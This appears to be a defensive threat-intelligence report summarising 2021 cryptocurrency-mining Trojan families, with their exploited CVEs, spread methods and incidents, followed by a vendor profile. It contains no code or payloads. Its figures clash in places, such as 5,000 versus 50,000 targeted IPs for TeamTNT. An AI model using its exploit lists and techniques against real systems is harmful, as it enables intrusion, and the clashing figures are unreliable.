1.Overview

Mining Trojans use various means to implant mining programs onto victims’ computers. Without the user’s knowledge, they exploit the victim’s computing power to mine cryptocurrencies, generating illegal profits. Currently, multiple threat groups (such as TeamTNT and H2Miner) are spreading mining Trojans, maliciously occupying and consuming user system resources and shortening hardware lifespan, severely impacting user productivity and daily life and hindering social development. In 2021, Antiy CERT published several analytical reports on mining Trojans. We have now compiled a list of typical mining Trojans from 2021, creating a family overview for sharing.

Mining Trojan Family	Appearance Time	Targeted Platform
Outlaw	November 2018	Linux
Tor2Mine	December 2018​​​	Windows
TeamTNT	October 2019	Windows, Linux
H2Miner	December 2019	Windows, Linux
Satan DDoS	May 2020	Windows, Linux
Sysrv-hello	December 2020​​​	Windows, Linux
Cloud Shovel	February 2021​	Linux
HolesWarm​	June 2021	Windows, Linux

2.The Dangers of Mining Trojans

1. Consumes a large amount of computer resources: Mining Trojans generally consume a large amount of system resources, causing the system and its services and application software to run slowly, and may even cause normal services to crash and result in data loss.
2. Reduced computer performance and lifespan: Computers infected with mining trojans generally have a shorter lifespan and severely degraded performance.
3. Waste energy and increase carbon emissions: Mining Trojans consume a large amount of electricity, resulting in huge energy consumption. At present, the main source of electricity is coal, which exacerbates carbon emissions pollution.
4. Leaving backdoors and generating botnets: Mining Trojans often add backdoors for password-free login via SSH, install RPC backdoors, receive commands from remote IRC servers, and install rootkit backdoors.
5. As a springboard for attacking other targets: Mining Trojans can control the victim’s server to launch a DDoS attack, use this server as a springboard to attack other computers, or release ransomware to demand a ransom.

3.Characteristics of the Mining Trojan Family

• Mining currency: In 2021, most mining organizations tend to mine Monero, mainly for the following reasons: First, Monero is an untraceable and strongly anonymous currency; second, Monero’s mining algorithm uses CPU mining efficiency to be higher, and the “zombies” controlled by botnets generally do not have high performance, that is, they do not have graphics cards (that is, they lack high-performance graphics cards), so in order to obtain more mining income, mining Monero has become the first choice of attackers; finally, against the background of increasing difficulty in mining Bitcoin, Monero’s price in the virtual currency market remains stable. Compared with Bitcoin, Monero is more valuable, and its corresponding mining income is also more stable.
• Competitiveness: By detecting and terminating the processes of other competing mining trojans, it monopolizes the computing resources of the target host.
• Persistence: Long-term persistence in the target system is achieved by adding scheduled tasks, creating services, setting automatic startup, RootKit , etc.
• Concealment and confrontation: Through process hiding, command replacement, process interlocking and other methods, confrontation detection and disposal are achieved.
• Targeted: These attacks evade security checks by adding malicious code to scripts that terminate and uninstall the security detection programs running on cloud service providers’ cloud hosts. Additionally, some mining trojans, such as Cloud Shovel and H2Miner, use scanning tools to detect the IP address ranges of one or more cloud service providers.
• Integration: In addition to the core mining function module, mining Trojans also integrate related components such as port scanning, vulnerability exploitation, and backdoors to achieve horizontal and widespread dissemination and build botnets, such as TeamTNT and Outlaw.
• Cross-platform: By exploiting web component vulnerabilities, combined with malicious PowerShell, Shell and other scripts, as well as malicious programs written in Python and Go languages, it is possible to run mining trojans across platforms, such as Sysrv-Hello and Satan. DDoS, etc.

4.Introduction to Typical Mining Trojan Families

4.1  Outlaw

The Outlaw botnet was first discovered in November 2018. At the time, it was a group that exploited vulnerabilities to compromise IoT devices and Linux servers and implanted malicious programs to form a botnet. They primarily engaged in Distributed Denial of Service (DDoS) attacks and provided DDoS-for-hire services on the dark web. Later, driven by the appreciation of virtual currencies, they began to embed mining trojans within botnet nodes. They then used the botnet to infiltrate and expand externally, acquiring vastly more computing resources and ultimately obtaining more virtual currency through mining.

4.1.1  Family Overview

Mining Trojan Family	Outlaw​
Appearance Time	November 2018​​​
Targeted Platform	Linux
Mode of Transmission	Vulnerability exploitation, SSH brute force cracking
Exploited Vulnerability	Shock Flaw Drupalgeddon2 vulnerability​
Mining Currency	Monero ( XMR )

4.1.2  Typical Cases

• Out law raids cloud server in the early morning

July 28, 2021, the Outlaw botnet attacked a large number of cloud hosts and implanted botnet programs. The infected hosts contained a large number of SSH brute force cracking records, and were implanted with mining programs and written with SSH public keys.

4.2  Tor2Mine​

Tor2Mine mining group has been around since 2018 and is known for its expertise in cryptocurrency mining and malware delivery. The group has deployed other malware, including the information-stealing malware AZORult, the remote access tool Remcos, the DarkVNC backdoor Trojan, and a Trojan that steals cryptocurrency data from the clipboard to steal more money. The name Tor2Mine comes from the fact that some variants use the Tor gateway to communicate with the virtual currency’s C2 server, hence the name Tor2Mine. In 2021, Tor2Mine became very active, using PowerShell scripts to attempt to disable security software, execute mining programs, and execute Mimikatz remote scripts to obtain Windows credentials to gain administrative privileges. Using these stolen credentials, Tor2Mine can actively spread, and if not completely removed or not protected by security software, it will continue to harm other systems on the infected network.

4.2.1 Family Overview

Mining Trojan Family	Tor2Mine
Appearance Time	December 2018​​​
Targeted Platform	Windows
Mode of Transmission	Exploits
Exploited Vulnerability	Unknown
Mining Currency	Monero ( XMR )

4.2.2  Typical Activities

• Researchers discover Tor 2Mine mining group using new variant to spread

In December 2021, researchers discovered that Tor2Mine began spreading using a new variant that uses PowerShell scripts to attempt to disable security software, execute mining programs, and obtain Windows credentials. Using these stolen credentials, Tor2Mine can actively spread and, if not fully cleaned or protected by security software, will continue to harm other systems on the infected network.

4.3 TeamTNT

Team TNT is a cyber threat group that targets cloud servers and containerized environments. First appearing in October 2019, the group infiltrates target systems and implants mining trojans and botnet programs, exploiting their resources for mining and establishing botnets. Over the past few years, the group has grown to control a vast botnet, using frequently updated attack components. This group has garnered sustained attention and tracking from cybersecurity defenders, with their attack activities publicly disclosed multiple times.

4.3.1  Family Overview

Mining Trojan Family	Team TNT
Appearance Time	October 2019​​
Targeted Platform	Windows, Linux
Mode of Transmission	Vulnerability exploitation, credential theft
Exploited Vulnerability	Docker Remote API Unauthorized Access Vulnerability
Mining Currency	Monero ( XMR )

4.3.2  Typical Cases

• TeamTNT launched an attack on the Kubernetes platform , nearly 5,000 IPs were attacked

Team TNT exploited exposed APIs on the Kubernetes platform to write and execute malicious scripts, install a Monero mining program, deploy the network scanning tool Masscan and the banner detection tool Zgrab, and subsequently download and install an IRC bot. Researchers have discovered that this attack took place between March and May 2021 and targeted 50,000 IP addresses, with IP addresses in China and the United States having the highest hit rate.

4.4 H2Miner​

The H2Miner mining trojan first appeared in December 2019. Initially and for a period thereafter, it targeted Linux platforms. However, after November 2020, it began exploiting WebLogic vulnerabilities to target Windows platforms and implant mining programs. Furthermore, this mining trojan frequently exploited other common web component vulnerabilities to invade related servers and implant mining programs. For example, in December 2021, attackers exploited a Log4j vulnerability to deploy the H2Miner mining trojan.

4.4.1  Family Overview

Mining Trojan Family	H2Miner
Appearance Time	December 2019​​​
Targeted Platform	Windows, Linux
Mode of Transmission	Exploits
Exploited Vulnerability	SaltStack Remote Code Execution (CVE-2020-11651) ThinkPHP5 RC E Apache Solr’s DataImportHandler (CVE-2019-0193) Redis Unauthorized RCE Confluence Unauthorized RCE (CVE-2019-3396) Web Logic RCE Vulnerability ( CVE-2020-14882/14883) Log4j vulnerability (CVE-2021-44228)
Mining Currency	Monero ( XMR )

4.4.2 Typical Cases

• 2021 Spring Festival, the H2Miner mining gang used multiple vulnerabilities to attack cloud hosts.

During the 2021 Spring Festival, the H2Miner mining gang took advantage of the relatively weak security operations during the Spring Festival holiday, used multiple vulnerability weapons to attack China’s cloud hosts, and used the compromised hosts to carry out mining, consuming a large amount of CPU resources of the victim hosts, seriously affecting the normal service operation of related hosts.

4.5  Satan DDoS

Satan DDoS is a botnet capable of launching DDoS attacks and delivering cryptocurrency mining programs. The malware’s authors call it “Satan DDoS”. To distinguish it from the Satan ransomware, Unit 42 researchers refer to it as “Lucifer”. This botnet first appeared on May 29, 2020. Initially, it exploited the CVE-2019-9081 vulnerability to compromise servers running Laravel Framework version 5.7.x. It then implanted cryptocurrency mining and botnet programs, establishing a massive botnet capable of conducting mining and external DDoS attacks. Later, the botnet exploited multiple vulnerabilities and brute force attacks to spread the cryptocurrency mining program and expand the botnet.

4.5.1 Family Overview

Mining Trojan Family	Satan DDoS, also known as Lucifer
Appearance Time	May 29, 2020
Targeted Platform	Windows、Linux
Mode of Transmission	Exploits and brute force attacks
Exploited Vulnerability	CVE-2014-6287 CVE-2018-1000861 CVE-2017-10271 ThinkPHP RCE Vulnerabilities (CVE-2018-20062) and CVE-2018-7600 CVE-2017-9791 CVE-2019-9081 PHPStudy Backdoor RCE CVE-2017-0144 CVE-2017-0145 and CVE-2017-8464
Mining Currency	Monero ( XMR )

4.5.2 Typical Activities

• The CVE-2019-9081 vulnerability was used to spread the virus in the early stages of the outbreak

May 29, 2020, Unit 42 researchers discovered a malicious sample with mining capabilities and DDoS attack capabilities from a large number of CVE-2019-9081 vulnerability exploitation incidents. Researchers monitored that the spread of this malicious sample stopped on June 10, 2020.

• Attacks targeting cloud hosts

June 2021, Satan The DDoS botnet exploited the Shiro 1.2.4 deserialization vulnerability to launch attacks against cloud hosts, adding new attack capabilities against Linux servers in an attempt to spread itself, expand the botnet, and enhance DDoS attack and large-scale mining capabilities.

4.6 Sysrv-hello

The Sysrv-hello mining trojan was first discovered on December 3, 2020. The initial sample infected numerous servers and has continued to spread through variants to date. This mining trojan possesses multiple capabilities, including port scanning, Linux gateway detection, and the ability to exploit RCE vulnerabilities in applications such as WebLogic, Tomcat, and MySQL , as well as embedding the mining trojan.

4.6.1 Family Overview

Mining Trojan Family	Sysrv-hello​
Appearance Time	December 3, 2020
Targeted Platform	Windows, Linux
Mode of Transmission	Exploits
Exploited Vulnerability	Mongo Express RCE (CVE-2019-10758) XXL-JOB Unauth RCE XML-RPC (CVE-2017-11610) Saltstack RCE (CVE-2020-16846) ThinkPHP RCE Drupal Ajax RCE (CVE-2018-7600)
Mining currency	Monero ( XMR )

4.6.2 Typical Cases

• Sysrv-hello adds new propagation capabilities, spreading mining programs by infecting web pages

Sysrv-hello variant began spreading on April 20, 2021. Analysis confirmed that the new variant checks the target system for the presence of relevant web page files or website directories to determine whether the system provides web services. If the target system provides web services, it moves the mining trojan to the corresponding path and modifies the web page files within it, causing the mining trojan to download and execute when the user visits the web page, further expanding the mining trojan’s distribution range.

4.7 Cloud Shovel

In February 2021, Antiy CERT discovered a mining trojan targeting Linux systems during network security monitoring. Analysis revealed that the mining trojan had hard-coded an IP address from a cloud platform network segment and was performing port pop-up and brute-force cracking on that IP address. Based on its attack characteristics, Antiy CERT named the mining trojan “Cloud Shovel”.

4.7.1 Family Overview

Mining Trojan Family	Cloud Shovel
Appearance Time	2021​​
Targeted Platform	Linux
Mode of Transmission	Brute force
Exploited Vulnerability	None
MiningCurrency	Monero ( XMR )

4.8 HolesWarm​

HolesWarm is a cross-platform worm virus that first broke out in June 2021. Within a month, it used more than 20 vulnerabilities to exploit the target system and implant mining trojans. The vulnerabilities used by this worm virus cover many components and applications that are frequently used in China. For example, OA office software such as UFIDA and Zhiyuan, and Tomcat, Web Logic, Shiro, Structur 2 and other components.

4.8.1 Family Overview

Mining Trojan Family	HolesWarm​
Appearance Time	June 2021​
Targeted Platform	Windows , Linux
Mode of Transmission	Exploits
Exploited Vulnerability	Hadoop Yarn Unauthorized Command Execution Vulnerability UFIDA GRP-U8 Injection-Command Execution Vulnerability Struts 2 RCE command execution vulnerability XXL-JOB Unauthorized Add Task Command Execution Vulnerability
Mining Currency	Monero (XMR)

4.8.2 Typical Cases

• The King of Vulnerability Exploits Among Mining Trojans

Since early June 2021, in nearly a month, a worm virus has spread rapidly and implanted mining Trojans. During this period, it exploited over 20 vulnerabilities, including those in OA office software such as UFIDA and ZHIYUAN, as well as components such as Tomcat, WebLogic, Structurs 2, and Spring. This worm has earned the industry the nickname “King of Vulnerability Exploits”, and the mining trojan has also been named “HolesWarm”.

Appendix: About Antiy

Antiy is committed to enhancing the network security defense capabilities of its customers and effectively responding to security threats. Through more than 20 years of independent research and development, Antiy has developed technological leadership in areas such as threat detection engines, advanced threat countermeasures, and large-scale threat automation analysis.

Antiy has developed IEP (Intelligent Endpoint Protection System) security product family for PC, server and other system environments, as well as UWP (Unified Workload Protect) security products for cloud hosts, container and other system environments, providing system security capabilities including endpoint antivirus, endpoint protection (EPP), endpoint detection and response (EDR), and Cloud Workload Protection Platform (CWPP) , etc. Antiy has established a closed-loop product system of threat countermeasures based on its threat intelligence and threat detection capabilities, achieving perception, retardation, blocking and presentation of the advanced threats through products such as the Persistent Threat Detection System (PTD), Persistent Threat Analysis System (PTA), Attack Capture System (ACS), and TDS. For web and business security scenarios, Antiy has launched the PTF Next-generation Web Application and API Protection System (WAAP) and SCS Code Security Detection System to help customers shift their security capabilities to the left in the DevOps process. At the same time, it has developed four major kinds of security service: network attack and defense logic deduction, in-depth threat hunting, security threat inspection, and regular security operations. Through the Threat Confrontation Operation Platform (XDR), multiple security products and services are integrated to effectively support the upgrade of comprehensive threat confrontation capabilities.

Antiy provides comprehensive security solutions for clients with high security requirements, including network and information authorities, military forces, ministries, confidential industries, and critical information infrastructure. Antiy has participated in the security work of major national political and social events since 2005 and has won honors such as the Outstanding Contribution Award and Advanced Security Group. Since 2015, Antiy’s products and services have provided security support for major spaceflight missions including manned spaceflight, lunar exploration, and space station docking, as well as significant missions such as the maiden flight of large aircraft, escort of main force ships, and Antarctic scientific research. We have received several thank-you letters from relevant departments.

Antiy is a core enabler of the global fundamental security supply chain. Nearly a hundred of the world’s leading security and IT enterprises have chosen Antiy as their partner of detection capability. At present, Antiy’s threat detection engine provides security detection capabilities for over 1.3 million network devices and over 3 billion smart terminal devices worldwide, which has become a “national-level” engine. As of now, Antiy has filed 1,877 patents in the field of cybersecurity and obtained 936 patents. It has been awarded the title of National Intellectual Property Advantage Enterprise and the 17th (2015) China Patent Excellence Award.

Antiy is an important enterprise node in China emergency response system and has provided early warning and comprehensive emergency response in major security threats and virus outbreaks such as “Code Red”, “Dvldr”, “Heartbleed”, “Bash Shellcode” and “WannaCry”. Antiy conducts continuous monitoring and in-depth analysis against dozens of advanced cyberspce threat actors (APT groups) such as “Equation”, “White Elephant”, “Lotus” and “Greenspot” and their attack actions, assisting customers to form effective protection when the enemy situation is accurately predicted.